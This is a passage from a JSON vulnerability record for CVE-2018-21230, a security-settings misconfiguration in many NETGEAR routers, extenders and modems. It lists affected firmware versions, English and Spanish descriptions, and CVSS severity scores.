"matchCriteriaId": "F285D60D-A5DA-4467-8F79-15EF8135D007",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:jnr1010_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "0005DB1D-49BA-4099-89DC-5B4C9AA8BF6F",
"versionEndExcluding": "1.1.0.42",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:jnr1010:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "CCE79B3F-8667-43C9-962D-EE089428F144",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:jr6150_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "4B5D8AD4-6C67-4DC7-99DF-B29DBA4BC376",
"versionEndExcluding": "1.0.1.10",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:jr6150:-:*:*:*:*:*:*:*",
"matchCriteriaId": "D67167E5-81D2-4892-AF41-CBB6271232D1",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:jwnr2010_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "8D0FEB73-5572-48DE-86BE-055364878989",
"versionEndExcluding": "1.1.0.42",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:jwnr2010:v5:*:*:*:*:*:*:*",
"matchCriteriaId": "7399E5E9-40D8-4ECD-8B7B-C96A27E10282",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:pr2000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "6E111C4B-C1D5-403A-A35F-D538E16D0E23",
"versionEndExcluding": "1.0.0.22",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:pr2000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "2451CC0C-71B2-474D-93F0-2B2ACD802FE3",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6050_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "CB4D669D-D6C4-403E-896D-55EE4EEB7C27",
"versionEndExcluding": "1.0.1.10",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6050:-:*:*:*:*:*:*:*",
"matchCriteriaId": "363D4DEE-98B9-4294-B241-1613CAD1A3A7",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6100_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "01A66936-4268-4990-8E83-24C74A75B9F6",
"versionEndExcluding": "1.0.1.16",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6100:-:*:*:*:*:*:*:*",
"matchCriteriaId": "9F44A123-B256-428B-98C2-17570F2F32DC",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6220_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "E464FF8D-6202-40BA-9740-9CCE2BC23607",
"versionEndExcluding": "1.1.0.50",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6220:-:*:*:*:*:*:*:*",
"matchCriteriaId": "B131B5C8-CB7F-433B-BA32-F05CE0E92A66",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6250_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "2DD089FE-0DBF-4C3B-AA02-3A0A27CF9D76",
"versionEndExcluding": "1.0.4.14",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6250:-:*:*:*:*:*:*:*",
"matchCriteriaId": "321BE843-52C4-4638-A321-439CA7B3A6F2",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6300_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "E43DA92A-E429-459F-8B34-DDED55F5590B",
"versionEndExcluding": "1.0.4.12",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6300:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "10938043-F7DF-42C3-8C16-F92CAF8E5576",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6400_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "C9A5FD9A-5AE9-46A2-A1E6-C7BF84EFAD22",
"versionEndExcluding": "1.0.2.34",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6400:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "52AE9AD2-BC8D-477D-A3D3-891AE52FA5F3",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6700_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "DC332E60-A7DB-41C5-B1ED-FE3EDF83F8BC",
"versionEndExcluding": "1.0.1.26",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6700:-:*:*:*:*:*:*:*",
"matchCriteriaId": "21B27F11-4262-4CE1-8107-B365A7C152F2",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6900_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "D21ACC48-8B3D-4A0B-BA04-C9709835A66A",
"versionEndExcluding": "1.0.1.26",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6900:-:*:*:*:*:*:*:*",
"matchCriteriaId": "0794BB7C-1BCF-4F08-8EB2-9C3B150C105A",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6900p_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "A8D2A56D-4AAA-4E55-AE7A-E343EA9D6133",
"versionEndExcluding": "1.2.0.22",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6900p:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C41908FF-AE64-4949-80E3-BEE061B2DA8A",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "819CC65F-F5DA-4620-BC68-CAAA2B73195D",
"versionEndExcluding": "1.0.9.6",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C9F86FF6-AB32-4E51-856A-DDE790C0A9A6",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7000p_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "4E7FE05C-8ACF-4D53-A6D9-2C99673CE41A",
"versionEndExcluding": "1.2.0.22",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7000p:-:*:*:*:*:*:*:*",
"matchCriteriaId": "DFE55F4D-E98B-46D3-B870-041141934CD1",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7100lg_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "EB388895-B579-43B7-A88E-4BD28D41F6E2",
"versionEndExcluding": "1.0.0.40",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7100lg:-:*:*:*:*:*:*:*",
"matchCriteriaId": "366FA778-3C2A-42AF-9141-DAD7043B406C",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7300dst_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "F0EE8EBA-C4CD-4CA1-A684-54338B1254A9",
"versionEndExcluding": "1.0.0.54",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7300dst:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C75148EB-DE6C-4C5C-BF34-4800A66CF11C",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7500_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "7F227D99-88C9-457F-BCA5-665F531E04AB",
"versionEndExcluding": "1.0.0.110",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7500:-:*:*:*:*:*:*:*",
"matchCriteriaId": "EF3B3F26-401C-4ED0-B871-4B4F8521F369",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7500_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "9ACBF492-1315-46CF-8297-E239DDB14B6B",
"versionEndExcluding": "1.0.3.26",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7500:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "2E0DFBF4-E393-44AE-AEF9-1B2059EE5AE8",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7800_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "DE1B60E4-C8FA-4094-9F05-1746A01557D9",
"versionEndExcluding": "1.0.2.44",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7800:-:*:*:*:*:*:*:*",
"matchCriteriaId": "17CF7445-6950-45FE-9D1A-E23F63316329",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7900_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "0B72579C-51F1-4F16-8FDE-544229C25B07",
"versionEndExcluding": "1.0.1.26",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7900:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C484840F-AF30-4B5C-821A-4DB9BE407BDB",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r8000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "7393D4D7-F607-423E-917E-FE520D7A3A73",
"versionEndExcluding": "1.0.3.48",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r8000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "5B39F095-8FE8-43FD-A866-7B613B495984",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r8300_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "DAAB159C-27F2-4645-9FE4-4DBB4465DE3A",
"versionEndExcluding": "1.0.2.104",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r8300:-:*:*:*:*:*:*:*",
"matchCriteriaId": "7A9B77E7-7439-48C6-989F-5E22CB4D3044",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r8500_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "A79D8A77-4555-4B2A-8F19-F69AD4A17D2E",
"versionEndExcluding": "1.0.2.104",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r8500:-:*:*:*:*:*:*:*",
"matchCriteriaId": "63500DE4-BDBD-4F86-AB99-7DB084D0B912",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r9000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "EEFCBDB9-47D0-40EF-9428-FF714763BC12",
"versionEndExcluding": "1.0.3.10",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r9000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "D74F1BFC-562E-4E7D-BBAB-2F8B593B5A57",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wn2000rpt_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "058BC554-8E48-460E-A305-B5CDA8249B28",
"versionEndExcluding": "1.0.1.26",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wn2000rpt:v3:*:*:*:*:*:*:*",
"matchCriteriaId": "6FB1BE0D-E3CF-4C16-8C11-706B238E9934",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wn2500rp_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "07CEF0FF-41A1-485B-8CDA-DB7AE8ECDB69",
"versionEndExcluding": "1.0.1.46",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wn2500rp:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "1C4C1B98-9551-4862-AEAC-3D5C313BD275",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wn3000rp_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "AAFDAF9A-711E-497F-8632-0345B635A7C9",
"versionEndExcluding": "1.0.2.66",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wn3000rp:v3:*:*:*:*:*:*:*",
"matchCriteriaId": "AB71AC74-2D1B-4F1E-A70F-6590A00AAD9E",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wn3100rp_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "8DB649EB-E2F9-4E11-B68A-50B0096AF9B6",
"versionEndExcluding": "1.0.0.56",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wn3100rp:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "4D8680F5-0C06-4CFC-8BA0-CF85D0438419",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wndr3400_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "DF8551B9-72D9-46B8-9F66-EE7841E29A26",
"versionEndExcluding": "1.0.1.14",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wndr3400:v3:*:*:*:*:*:*:*",
"matchCriteriaId": "1992E44C-122C-41BC-8FDC-5F9EBEE1FB7C",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wndr3700_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "FAF6A089-4E7D-43D1-AF1F-01A7A592115E",
"versionEndExcluding": "1.0.2.96",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wndr3700:v4:*:*:*:*:*:*:*",
"matchCriteriaId": "257A5E68-8EDC-44F5-A85C-83A91C93CCE5",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wndr3700_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "832B6460-9984-4441-8E06-F784052FC8CC",
"versionEndExcluding": "1.1.0.54",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wndr3700:v5:*:*:*:*:*:*:*",
"matchCriteriaId": "EC5B6CB8-D439-42D5-ACAE-6246874EA5F0",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wndr4300_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "EF96C0EB-8CB6-4C86-A9A2-A4C7AF58C97F",
"versionEndExcluding": "1.0.2.98",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wndr4300:-:*:*:*:*:*:*:*",
"matchCriteriaId": "1413C591-D066-4FA2-BEB1-6C60F8645F28",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wndr4300_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "8B1EBB8F-818F-4E04-BB25-A81C1C309CD0",
"versionEndExcluding": "1.0.0.48",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wndr4300:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "4428B145-B86D-4709-BBA9-64BDE7D35A25",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wndr4500_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "9591B73B-93BF-4976-998B-0200C990EF6A",
"versionEndExcluding": "1.0.0.48",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wndr4500:v3:*:*:*:*:*:*:*",
"matchCriteriaId": "C31D6808-4103-4543-B7AB-84A79CD12006",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wnr1000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "6880E178-51E5-47DD-8DE6-59EFDAE4FA0C",
"versionEndExcluding": "1.1.0.42",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wnr1000:v4:*:*:*:*:*:*:*",
"matchCriteriaId": "C8218868-273B-46DB-B636-D3F9A3768069",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wnr2000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "124ABC0A-DD68-4540-AAC2-C4E87CDC91A7",
"versionEndExcluding": "1.0.0.64",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wnr2000:v5:*:*:*:*:*:*:*",
"matchCriteriaId": "317F25FF-B3A2-4C68-888F-D2627C564867",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wnr2020_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "4130E37C-5B30-46E5-90B0-A7D5E163DF02",
"versionEndExcluding": "1.1.0.42",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wnr2020:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C2189628-03E7-445A-9EF2-656A85539115",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wnr2050_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "2C4DA2EE-628D-4F25-9B7E-0F77762139B0",
"versionEndExcluding": "1.1.0.42",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wnr2050:-:*:*:*:*:*:*:*",
"matchCriteriaId": "9877579C-D214-4605-93AA-2B78914CF33C",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Certain NETGEAR devices are affected by incorrect configuration of security settings. This affects D1500 before 1.0.0.27, D500 before 1.0.0.27, D6100 before 1.0.0.57, D6220 before 1.0.0.40, D6400 before 1.0.0.74, D7000 before 1.0.1.60, D7800 before 1.0.1.34, D8500 before 1.0.3.39, DGN2200v4 before 1.0.0.94, DGN2200Bv4 before 1.0.0.94, EX2700 before 1.0.1.42, EX3700 before 1.0.0.64, EX3800 before 1.0.0.64, EX6000 before 1.0.0.24, EX6100 before 1.0.2.18, EX6120 before 1.0.0.32, EX6130 before 1.0.0.22, EX6150 before 1.0.0.34_1.0.70, EX6200 before 1.0.3.82_1.1.117, EX6400 before 1.0.1.78, EX7000 before 1.0.0.56, EX7300 before 1.0.1., JNR1010v2 before 1.1.0.42, JR6150 before 1.0.1.10, JWNR2010v5 before 1.1.0.42, PR2000 before 1.0.0.22, R6050 before 1.0.1.10, R6100 before 1.0.1.16, R6220 before 1.1.0.50, R6250 before 1.0.4.14, R6300v2 before 1.0.4.12, R6400v2 before 1.0.2.34, R6700 before 1.0.1.26, R6900 before 1.0.1.26, R6900P before 1.2.0.22, R7000 before 1.0.9.6, R7000P before 1.2.0.22, R7100LG before 1.0.0.40, R7300DST before 1.0.0.54, R7500 before 1.0.0.110, R7500v2 before 1.0.3.26, R7800 before 1.0.2.44, R7900 before 1.0.1.26, R8000 before 1.0.3.48, R8300 before 1.0.2.104, R8500 before 1.0.2.104, R9000 before 1.0.3.10, WN2000RPTv3 before 1.0.1.26, WN2500RPv2 before 1.0.1.46, WN3000RPv3 before 1.0.2.66, WN3100RPv2 before 1.0.0.56, WNDR3400v3 before 1.0.1.14, WNDR3700v4 before 1.0.2.96, WNDR3700v5 before 1.1.0.54, WNDR4300 before 1.0.2.98, WNDR4300v2 before 1.0.0.48, WNDR4500v3 before 1.0.0.48, WNR1000v4 before 1.1.0.42, WNR2000v5 before 1.0.0.64, WNR2020 before 1.1.0.42, and WNR2050 before 1.1.0.42."
},
{
"lang": "es",
"value": "Determinados dispositivos NETGEAR est\u00e1n afectados por una configuraci\u00f3n incorrecta de los ajustes de seguridad. Esto afecta a D1500 versiones anteriores a 1.0.0.27, D500 versiones anteriores a 1.0.0.27, D6100 versiones anteriores a 1.0.0.57, D6220 versiones anteriores a 1.0.0.40, D6400 versiones anteriores a 1.0.0.74, D7000 versiones anteriores a 1.0.1.60, D7800 versiones anteriores a 1.0.1.34, D8500 versiones anteriores a 1.0.3.39, DGN2200v4 versiones anteriores a 1.0.0.94, DGN2200Bv4 versiones anteriores a 1.0.0.94, EX2700 versiones anteriores a 1.0.1.42, EX3700 versiones anteriores a 1.0.0.64, EX3800 versiones anteriores a 1.0.0.64, EX6000 versiones anteriores a 1.0.0.24, EX6100 versiones anteriores a 1.0.2.18, EX6120 versiones anteriores a 1.0.0.32, EX6130 versiones anteriores a 1.0.0.22, EX6150 versiones anteriores a 1.0.0.34_1.0.70, EX6200 versiones anteriores a 1.0.3.82_1.1.117, EX6400 versiones anteriores a 1.0.1.78, EX7000 versiones anteriores a 1.0.0.56, EX7300 versiones anteriores a 1.0.1., JNR1010v2 versiones anteriores a 1.1.0.42, JR6150 versiones anteriores a 1.0 .1.10, JWNR2010v5 versiones anteriores a 1.1.0.42, PR2000 versiones anteriores a 1.0.0.22, R6050 versiones anteriores a 1.0.1.10, R6100 versiones anteriores a 1.0.1.16, R6220 versiones anteriores a 1.1.0.50, R6250 versiones anteriores a 1.0.4.14, R6300v2 versiones anteriores a 1.0.4.12, R6400v2 versiones anteriores a 1.0.2.34 , R6700 versiones anteriores a 1.0.1.26, R6900 versiones anteriores a 1.0.1.26, R6900P versiones anteriores a 1.2.0.22, R7000 versiones anteriores a 1.0.9.6, R7000P versiones anteriores a 1.2.0.22, R7100LG versiones anteriores a 1.0.0.40, R7300DST versiones anteriores a 1.0.0.54, R7500 versiones anteriores a 1.0.0.110, R7500v2 versiones anteriores a 1.0.3.26, R7800 versiones anteriores a 1.0.2.44, R7900 versiones anteriores a 1.0.1.26, R8000 versiones anteriores a 1.0.3.48, R8300 versiones anteriores a 1.0.2.104, R8500 versiones anteriores a 1.0.2.104, R9000 versiones anteriores a 1.0.3.10, WN2000RPTv3 versiones anteriores a 1.0.1.26, WN2500RPv2 versiones anteriores a 1.0 .1.46, WN3000RPv3 versiones anteriores a 1.0.2.66, WN3100RPv2 versiones anteriores a 1.0.0.56, WNDR3400v3 versiones anteriores a 1.0.1.14, WNDR3700v4 versiones anteriores a 1.0.2.96, WNDR3700v5 versiones anteriores a 1.1.0.54, WNDR4300 versiones anteriores a 1.0.2.98, WNDR4300v2 versiones anteriores a 1.0.0.48, WNDR4500v3 versiones anteriores a 1.0.0.48, WNR1000v4 versiones anteriores a 1.1.0.42, WNR2000v5 versiones anteriores a 1.0.0.64, WNR2020 versiones anteriores a 1.1.0.42 y WNR2050 versiones anteriores a 1.1.0.42."
}
],
"id": "CVE-2018-21230",
"lastModified": "2024-11-21T04:03:14.210",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "ADJACENT_NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.8,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:A/AC:L/Au:N/C:P/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 6.5,
"impactScore": 4.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "ADJACENT_NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.2,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.0"
},
"exploitabilityScore": 2.1,
"impactScore": 2.7,
"source": "cve@mitre.org",
"type": "Secondary"
}
],
